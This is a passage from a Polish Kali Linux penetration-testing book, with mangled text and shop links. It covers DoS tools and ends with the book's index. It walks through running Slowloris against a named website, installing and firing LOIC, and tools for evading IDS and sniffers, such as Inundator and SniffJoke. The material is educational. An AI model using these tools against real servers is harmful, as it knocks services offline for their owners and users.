programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco

czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera

Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne

Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris

Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej

perl slowlorispl

W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)

perl slowlorispl -dns thesecuritybloggercom

Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)

Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)

Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

263

LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

264

narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki

Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa

Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej

apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs

Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej

mkdir loic

Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej

wget httpsrawgithubcomnicolargoloicinstaller masterloicsh

Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie

chmod 777 loicsh

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

265

Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej

loicsh install

Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie

loicsh update

Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie

loicsh run

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

266

U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny

Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP

Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding

Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane

DNSChef

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

267

Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne

Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera

SniffJoke

SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

268

SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force

Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)

Sk adnia wywo ania polecenia siege jest nast puj ca

siege [opcje] ltadres URL celugt

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

269

Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-

nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku

InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

270

wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS

TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych

Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci

PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce

W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia

W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew

Kup książkę Poleć książkę

Skorowidz

Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275

harmonogram 276zabezpiecze systemu 276

ALE 31analiza

bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych

zawieraj cychoprogramowanie firmware298

ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat

299zawarto ci plikoacutew PDF 299

da HTTP 203aplet Java 156aplikacje internetowe 23

b dy w zabezpieczeniach286

wykrywanie i mapowanie 241zakres testoacutew penetracyjnych

23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212

ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki

brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji

internetowych 147na parametry metod GET

i POST 131na protoko y komunikacyjne

256na serwery aplikacji

internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie

zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151

amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257

wykorzystuj ce przeci eniepo cze sieciowych 256

XSS 223 248z klonowaniem 151z u yciem narz dzi

penetracyjnych opartychna przegl darkach 236

audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301

Authentication hijacking 225Autopsy 295AV 31

BBackTrack 38badanie zasoboacutew sieci

komputerowych 65bazy danych 218BeEF 232

panel zarz dzania pakietu 234przechwycony system 235

bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272

a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania

i urz dze 274podstawowe wymogi 273

bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych

288 291narz dzia 293partycje 292suma kontrolna 294

Kup książkę Poleć książkę

Skorowidz

330

black-box 24 30BootKey 171 173Browser Exploitation

Framework 232brute-force 125 170

amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238

Intercept 241opcje konfiguracyjne 239

Burp Spider 241 244Burp Suite 238

Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty

CEH 311CISSP 31 193g oacutewnego urz du certyfikacji

106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282

chkrootkit 295chntpw 180

uruchomienie w Kali Linux182

ciasteczka 197edytowanie zawarto ci 199

201niezabezpieczone 208obrona przed

przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200

ci g zaburzaj cy 170Cisco Network Foundation

Protection 275CISSP 193Clickjacking 196

kod roacuted owy stron 197obrona przed atakiem 287

CmosPwd 190

Cookie Cadger 203dane o sesji 204

Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185

znaki specjalne 186CutyCapt 327czarne pude ko 24

DDBPwAudit 229dc3dd 293 297dd 291DDoS 256

kategorie atakoacutew 256obrona przed atakiem 285

Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128

raport 130Distributed Denial of Service

256DNS 267DNSChef 266dokumentacja 306DoS 256

kategorie atakoacutew 256obrona przed atakiem 285

dost p do systemualternatywny 37techniki XSS 225

dost pno 30Dradis 325Driftnet 217dsniff 212

nas uchiwaniei przechwytywaniepakietoacutew 213

uruchamianie 214dual-boot configuration 44

EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate

Authority 282Ettercap 214

lista celoacutew 216skanowanie sieci 216

Exploitation Tools 36 37 48exploity 92 113

Reserve_TCP Meterpreter156

Ffa szywe

adresy IP 285odpowiedzi DNS 267witryny 159 252

Ferret 209uruchamianie 210

FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84

utworzenie nowego projektu84

Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170

kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93

Ggenerator

hase 278adunkoacutew 132

GHDB 63GIT 250glosariusz 319

Kup książkę Poleć książkę

Skorowidz

331

Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246

instancja projektu 225

HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137

dost pu 250generowanie listy 185amanie 169

ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169

249si a 277w systemie Linux 173w systemie Windows 171

haszowanie 170z dodatkiem soli

kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125

uruchomienie 128

IICMP Echo Request 70identyfikacja

adresoacutew URL 227celoacutew za pomoc serweroacutew

DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci

188

iFrame 196Information Gathering 34 46informatyka ledcza 287

zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria

spo eczna 148wsteczna 48

ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142

Jj zyk SQL 218John the Ripper 137 173

domy lna konfiguracjacie ek 176

haszowanie 170amanie hase 174

proces 137amanie pliku hase 139

s owniki 138 177szybko dzia ania 138

Johnny 138amanie hase 174

opcje konfiguracyjneprogramu 175

s owniki 177uruchamianie 175

KKali Linux 15

aktualizacja pakietu SET 150instalowanie 40

pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania

sprz towe 40narz dzia dost pne

w systemie 46Network Install 40proces konfigurowania

partycji dysku 42publiczny adres IP 225s owniki 129

uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39

wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147

aplikacji internetowych 169191

HTTP 262klonowanie

rodowiska 278witryny internetowej 66 153

158 251 279klucze uruchamiania systemu

171 173komunikaty

ICMP 70o up ywie czasu dania 70

kopiowanie plikoacutew SAMi SYSTEM z hosta 172

LLinux amanie hase 173lista

adresoacutew URL 227potencjalnych hase 185

listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263

tryby 266luki w zabezpieczeniach

aktualizacja bazy 276aplikacji internetowych 245

254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty

elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92

LVM 43

Kup książkę Poleć książkę

Skorowidz

332

adunek 117amanie hase 137 169

bezp atne us ugi sieciowe190

haszowanych 189maska 189narz dzia 174przechowywanych w plikach

systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper

174zabezpieczaj cych BIOS

komputera 190cza modyfikacja 196

MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74

zadania 76Maltego CaseFile 326man-in-the-middle 139 211

obrona przed atakiem 281przeprowadzanie manualne

212maska 189mechanizmy

HSTS 140klonowania 153obronne 231 271

testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego

po czenia SSL 257usuwania mi kkich b doacutew

404 93mened er LVM 43metadane 83

wyszukiwanie i analiza 83Metasploit 113 154

skanowanie sieci lokalnej 114wersja konsolowa 114

meterpreter 151uruchomienie sesji 156wykorzystanie 156

metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24

310 323metody

pojedynczegouwierzytelniania 194

szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem

Windows 172

Nnag oacutewki X-Frame-Options 287narz dzia

do klonowania witryn 281do amania hase 174do przechwytywania sesji

198do przeprowadzania atakoacutew

DoSDDoS 285ledcze 295

wspomagaj ce tworzenieraportoacutew 325

nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228

nazwy DNS 71Nessus 162

HomeFeed 163instalowanie w systemie

Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164

Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe

263Nmap 76

agresywne skanowanie 79graficzny interfejs

u ytkownika 77okno wynikoacutew skanowania 82opcje 79

NoScript 287no niki danych 288

Oobrona przed atakami

Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek

286SSLstrip 284

ocena ryzyka 30formu y 31okna serwisowe 277

ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183

uruchomienie w Kali Linux184

osobista weryfikacja to samo ci194

oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu

poufno ci 307otwarta implementacja sterownikoacutew

kart graficznych 178Owasp-Zap 105 245

automatyczne logowanie 110konfigurowanie przegl darki

108mechanizm aktualizacji ca ego

pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111

PPAE 39pakiety

ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259

pami masowa urz dze 289partycje 172

wymiany 291Pasco 299Password Attacks 37 47 174Patator 229

Kup książkę Poleć książkę

Skorowidz

333

pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki

binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180

wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie

299poczta elektroniczna 123

fa szywe wiadomo ci 159podatno na atak 29

aktualizacja bazy 276aplikacji internetowych 245

254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226

podnoszenie uprawnie 37podstawowe wymogi

bezpiecze stwa 303podsumowanie ustale 313polecenia

apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70

getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116

polityka zarz dzania has ami 277po czenia

HTTP 268HTTPS 268

po czeniaTCP 267troacutejetapowe 79VPN 282

poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276

porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142

poufno 30poziom zabezpiecze

minimalny 274podstawowy 274

PREROUTING 143

Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty

Emily 59Gruyere 224 246

promiscuous mode 47Protocol Attacks 256protoko y

8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281

ProxyStrike 98robot sieciowy 100

przechwytywanieciasteczek 197 209 286danych logowania

u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych

w sieci 217pakietoacutew 213

sieciowych 210TCP 259

przechwytywaniepo cze 161

TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267

270sesji 197 208 233

narz dzia 198przegl d projektu 306przegl darki 232

ochrona przed atakami 236zabezpieczenia 249

przekazywanie pakietoacutew IP 142212

przekierowaniepo cze 284portoacutew komunikacyjnych

142ruchu sieciowego 141sesji 284

przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173

Kup książkę Poleć książkę

Skorowidz

334

RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy

b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce

tworzenie 325o wiadczenie o zachowaniu

poufno ci 307podatno ci i luki

w zabezpieczeniach 315podsumowanie ustale 313

zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury

testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje

dla rodowiska sieciowego316

wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami

dokumentacji 308zgodno ze standardami

i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316

powykonawcze 28rekonesans 34 51

badanie zasoboacutew siecikomputerowych 65

Google hacking 61

Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy

adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u

ICMP 69z wykorzystaniem serweroacutew

DNS 71zadania 52zasoby serwisoacutew

spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54

rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia

zdarzenia 31rootkit 295rozsy anie spreparowanych

pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206

adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285

SSAM 171samdump2 178Scalpel 299

Scapy 257 259scenariusze atakoacutew 260

security assessment 21security audit 21serwery 91

aplikacji internetowych 92223zabezpieczanie 136 249

atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236

wykorzystanie 238Samba 116sieciowe 91WWW 262

serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71

serwisy spo eczno ciowe 58sesja 195

ciasteczka 197logowania 205mechanizmy bezpiecze stwa

195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249

adres IP sklonowanej witryny158

aplet Java 156Credential Harvester Attacks

157Exploit to deliver 154importowanie w asnych

plikoacutew witrynyinternetowej 158

IP addresshostname forreverse connection 154

mechanizmy chroni ceprzeprowadzany atak 155

NATPort forwarding 154przechwycenie nazw kont

i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych

wiadomo ci 159URL you want to clone 154

Kup książkę Poleć książkę

Skorowidz

335

uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku

z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery

biometryczne 194stron internetowych 246

skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u

ICMP 70Skipfish 95

raport 97s owniki 96

skryptyopakowuj ce 228wykrywanie

nieautoryzowanychskryptoacutew 287

XSS 224 226SLE 31Slowloris 261s owa kluczowe

dbs 222FUZZ 133 135tables 222

sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata

31sqlmap 221SSL stripping 140SSLstrip 140 197 211

konfigurowanieprzekierowania portoacutew 142

mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141

SSO 194

standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293

baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy

BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia

i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231

szablony witryn 251szare pude ko 24szyfrowane po czenia

https 197VPN 282

Ttablice t czowe 170 189

amanie hase systemuWindows 183

Tamper Data 125TCPReplay 270Tenable 163testowanie

dzia ania roacute nych urz dzesieciowych 270

mechanizmoacutew obronnych 273odporno ci na przeci enia

268podatno ci na ataki XSS 224sklonowanego rodowiska

279testy

o nieograniczonym zakresiedzia ania 26

odporno ci na przeci eniesystemu 256

warunkoacutew skrajnych 256

testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu

zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu

Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33

THX-SSL-DOS 257tokeny 194

sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259

Uumowy

oczekiwania klienta 317potencjalne problemy

i zagadnienia 324rozliczane wed ug zu ycia

czasu i zasoboacutew 305wykaz prac 319ze sta cen 304

unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi

NAT 251profesjonalne 304w chmurze 211

